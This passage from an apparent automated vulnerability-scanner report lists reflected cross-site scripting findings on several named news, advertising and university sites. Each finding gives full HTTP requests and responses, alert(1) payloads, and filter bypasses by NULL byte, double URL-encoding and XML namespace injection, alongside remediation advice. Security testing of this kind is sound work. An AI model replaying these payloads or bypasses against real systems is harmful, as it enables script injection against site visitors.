This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /json?c=OXM_51314736366e001c%3balert(1)//b78489c2671&pid=26262ed9-a045-4821-ad98-1310bdc31ad4&s=160x600&f=1&cid=oxpv1%3A34-632-1929-1220-3481&hrid=dce2c268a43ae4acdfbf825bd6a06a66-1291762417&url=http%3A%2F%2Fwww.mercurynews.com%2Frss HTTP/1.1 Host: bid.openx.net Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/rss Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: p=1288929081; i=fbf7d168-c8b8-40a4-925d-de40517e7bc2
Response
HTTP/1.1 200 OK Content-Type: text/javascript; charset=iso-8859-1 Cache-Control: no-cache, must-revalidate P3P: CP="CUR ADM OUR NOR STA NID" Connection: close Expires: Mon, 26 Jul 1997 05:00:00 GMT Pragma: no-cache Set-Cookie: s=93ecc92c-0d95-43aa-b8fe-8bee6a58481f; version=1; path=/; domain=.openx.net; Set-Cookie: p=1291762937; version=1; path=/; domain=.openx.net; max-age=63072000;
The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload d7cfe%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253eb0bc9c805d2 was submitted in the REST URL parameter 18. This input was echoed as d7cfe<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>b0bc9c805d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 18 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /syndication/xml/i/58c04479-79ac-40a6-9463-ff079ae00951/iv/4/n/code/nv/4/p/1/r/505d64dc-c6d5-4a6e-b0dc-75e597e8d2ef/rv/72/t/a799b2a11500968f70468142cdb62dae0dd701250000012cb7e9051ad7cfe%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253eb0bc9c805d2/u/1/ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://widgetserver.com/syndication/flash/wrapper/InsertWidget.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/xml;charset=UTF-8 Date: Tue, 07 Dec 2010 23:08:39 GMT Expires: Fri, 10 Dec 2010 23:07:39 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 6365
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b7155<a>5ce25a3d4a5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/xml/i/58c04479-79ac-40a6-9463-ff079ae00951b7155<a>5ce25a3d4a5/iv/4/n/code/nv/4/p/1/r/505d64dc-c6d5-4a6e-b0dc-75e597e8d2ef/rv/72/t/a799b2a11500968f70468142cdb62dae0dd701250000012cb7e9051a/u/1/ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://widgetserver.com/syndication/flash/wrapper/InsertWidget.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/xml;charset=UTF-8 Date: Tue, 07 Dec 2010 23:04:33 GMT Expires: Sun, 7 May 1995 12:00:00 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Pragma: no-cache Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 1697
The value of the selectedProgramStreamId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76947"><script>alert(1)</script>3d7c6f7006 was submitted in the selectedProgramStreamId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ucsc/public/category/courseDetails.do?method=load&courseId=2794074&selectedCategoryId=1000075&selectedProgramAreaId=&selectedProgramStreamId=76947"><script>alert(1)</script>3d7c6f7006 HTTP/1.1 Host: courses.ucsc-extension.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 07 Dec 2010 23:15:38 GMT Server: Apache/2.2.16 (Win32) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_jk/1.2.20 Set-Cookie: JSESSIONID=492A921086A1145C3CCE3FD0EDEA9131; Path=/ucsc Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 34669
<HTML> <HEAD> <TITLE>19001 Bioscience Business Development: Building Value | U ...[SNIP]... <a href="courseSectionInfoRequest.do;jsessionid=492A921086A1145C3CCE3FD0EDEA9131?method=load&page=EmailTo&selectedCategoryId=1000075&selectedProgramAreaId=&selectedProgramStreamId=76947"><script>alert(1)</script>3d7c6f7006"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004d185"><a>4601cfb6140 was submitted in the REST URL parameter 1. This input was echoed as 4d185"><a>4601cfb6140 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /base%004d185"><a>4601cfb6140/forEach.js HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 07 Dec 2010 23:16:18 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1537 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00e79b8<a>930c5a5050d was submitted in the REST URL parameter 1. This input was echoed as e79b8<a>930c5a5050d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /base%00e79b8<a>930c5a5050d/forEach.js HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 07 Dec 2010 23:16:24 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1533 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00bf8e8<a>6fde2a89073 was submitted in the REST URL parameter 2. This input was echoed as bf8e8<a>6fde2a89073 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /base/forEach.js%00bf8e8<a>6fde2a89073 HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 07 Dec 2010 23:16:35 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1511 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00aebf5"><script>alert(1)</script>02a200f0b70 was submitted in the REST URL parameter 1. This input was echoed as aebf5"><script>alert(1)</script>02a200f0b70 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%00aebf5"><script>alert(1)</script>02a200f0b70/2005/10/add-event/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 07 Dec 2010 23:18:01 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1794 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00aadf9<a>a989804bd50 was submitted in the REST URL parameter 1. This input was echoed as aadf9<a>a989804bd50 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%00aadf9<a>a989804bd50/2005/10/add-event/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 07 Dec 2010 23:18:02 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1648 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4e584<a>f04cea051d7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /weblog/2005/10/add-event4e584<a>f04cea051d7/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 07 Dec 2010 23:19:38 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php Expires: Tue, 07 Dec 2010 23:19:38 GMT Last-Modified: Tue, 07 Dec 2010 23:19:38 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1356 Connection: close Content-Type: text/html; charset=UTF-8
4.16. http://dean.edwards.name/weblog/2005/10/add-event/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dean.edwards.name
Path:
/weblog/2005/10/add-event/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d65aa"><script>alert(1)</script>dd1472c7339 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d65aa\"><script>alert(1)</script>dd1472c7339 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /weblog/2005/10/add-event/?d65aa"><script>alert(1)</script>dd1472c7339=1 HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload f313a<script>alert(1)</script>ecc40386835 was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.mercurynews.com%2F&uid=fC2x6y5eJIhcKcBK_187469609f313a<script>alert(1)</script>ecc40386835&xy=0%2C0&wh=728%2C90&vchannel=262034929&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.1&iframed=1 HTTP/1.1 Host: event.adxpose.com Proxy-Connection: keep-alive Referer: http://redcated/NYC/iview/262034929/direct/01?click=http://a1.interclick.com/icaid/113481/tid/384706bf-d572-41de-a346-230b539e43c9/click.ic? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=f866ba45-336f-42c1-b17b-f0a6d405ba6f
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=5F493F1D52EC04489167C8AFE94ADB23; Path=/ Cache-Control: no-store Content-Type: text/javascript;charset=UTF-8 Content-Length: 148 Date: Tue, 07 Dec 2010 23:04:14 GMT Connection: close
if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("fC2x6y5eJIhcKcBK_187469609f313a<script>alert(1)</script>ecc40386835");
4.18. http://events.contracostatimes.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.contracostatimes.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a220"><script>alert(1)</script>e649cd5a30e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?7a220"><script>alert(1)</script>e649cd5a30e=1 HTTP/1.1 Host: events.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/?7a220"><script>alert(1)</script>e649cd5a30e=1" /> ...[SNIP]...
4.19. http://events.mercurynews.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.mercurynews.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7869"><script>alert(1)</script>f59b074de28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?f7869"><script>alert(1)</script>f59b074de28=1 HTTP/1.1 Host: events.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; zvents_tracker_sid=iwud1gSS-tsOrG5dfNsJ8A.95549602; s_sq=%5B%5BB%5D%5D; welcome=iwud1gSS-tsOrG5dfNsJ8A.95549602; __qca=P0-326766520-1291762315669;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/?f7869"><script>alert(1)</script>f59b074de28=1" /> ...[SNIP]...
4.20. http://events.mercurynews.com/movies [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.mercurynews.com
Path:
/movies
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5e1e"><script>alert(1)</script>6715bf84cbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /movies?a5e1e"><script>alert(1)</script>6715bf84cbd=1 HTTP/1.1 Host: events.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; zvents_tracker_sid=iwud1gSS-tsOrG5dfNsJ8A.95549602; s_sq=%5B%5BB%5D%5D; welcome=iwud1gSS-tsOrG5dfNsJ8A.95549602; __qca=P0-326766520-1291762315669;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/movies?a5e1e"><script>alert(1)</script>6715bf84cbd=1" /> ...[SNIP]...
4.21. http://forums.contracostatimes.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.contracostatimes.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75c5e"-alert(1)-"5364fca3e44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?75c5e"-alert(1)-"5364fca3e44=1 HTTP/1.1 Host: forums.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 07 Dec 2010 23:22:29 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=91a81bfddc448d1e70609b2e4644b4e6; expires=Fri, 31 Dec 2010 02:55:49 GMT; path=/; domain=.forums.contracostatimes.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 07 Dec 2010 23:22:53 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 54603
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79da2"-alert(1)-"382347babb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum79da2"-alert(1)-"382347babb8/article-comments-comments-on-news HTTP/1.1 Host: forums.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 07 Dec 2010 23:23:04 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=0c89588944bf90cb8f2842f87d81ddd6; expires=Fri, 31 Dec 2010 02:56:24 GMT; path=/; domain=.forums.contracostatimes.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 07 Dec 2010 23:23:28 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22636
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddfe7"-alert(1)-"b0e7e1dbb38 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/article-comments-comments-on-newsddfe7"-alert(1)-"b0e7e1dbb38 HTTP/1.1 Host: forums.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 07 Dec 2010 23:23:16 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=5bef9514c35222453a3f8cdbe8733edd; expires=Fri, 31 Dec 2010 02:56:36 GMT; path=/; domain=.forums.contracostatimes.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 07 Dec 2010 23:23:40 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16724
4.24. http://forums.contracostatimes.com/forum/article-comments-comments-on-news [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.contracostatimes.com
Path:
/forum/article-comments-comments-on-news
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 716bb"-alert(1)-"1cf095b9b07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/article-comments-comments-on-news?716bb"-alert(1)-"1cf095b9b07=1 HTTP/1.1 Host: forums.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 07 Dec 2010 23:22:30 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=1902f515b77768082963b8bc4eda9506; expires=Fri, 31 Dec 2010 02:55:50 GMT; path=/; domain=.forums.contracostatimes.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 07 Dec 2010 23:22:54 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31781
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e641"-alert(1)-"9d0010d2e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll9e641"-alert(1)-"9d0010d2e1 HTTP/1.1 Host: forums.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 07 Dec 2010 23:22:46 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=76d68d1a4e8b8cec9600b1c34437ec03; expires=Fri, 31 Dec 2010 02:56:06 GMT; path=/; domain=.forums.contracostatimes.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 07 Dec 2010 23:23:10 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22562
4.26. http://forums.contracostatimes.com/poll [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.contracostatimes.com
Path:
/poll
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbe39"-alert(1)-"09931698101 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll?cbe39"-alert(1)-"09931698101=1 HTTP/1.1 Host: forums.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 07 Dec 2010 23:22:17 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=3fcb054e0ed856a11dd8cb47580a5646; expires=Fri, 31 Dec 2010 02:55:37 GMT; path=/; domain=.forums.contracostatimes.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 07 Dec 2010 23:22:41 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20216
4.27. http://forums.mercurynews.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
